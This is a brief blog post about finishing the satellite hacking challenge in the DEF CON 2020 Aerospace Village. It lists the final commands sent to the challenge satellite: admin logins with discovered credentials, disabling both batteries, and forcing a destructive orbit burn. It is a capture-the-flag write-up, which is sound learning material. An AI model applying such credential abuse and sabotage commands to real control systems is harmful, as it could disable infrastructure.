Contents

Defcon Aerospace Vilage - Hacking Satellites

Contents

One good thing came out of Covid19 and that was that Defcon was run online in 2020 which meant that Pi and I got to attend.

Since I have a particular interest in space, satellites and radio, we spent a good portion of the weekend working on the satellite hacking challenge, which we eventually completed. Below are my final commands that were sent to the satellite.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
!cmd login unakarlsen password
!cmd login admin 5p4c3d07c0m


!cmd ant calc -33 19 10
!cmd ant set sec 130
!cmd ant set pri 130


!cmd temp set 50 100

!cmd bat disable pri
!cmd bat disable sec

!cmd orbit mode man

!cmd orbit set inclination 180
!cmd orbit set eccentricity 3

!cmd orbit ignite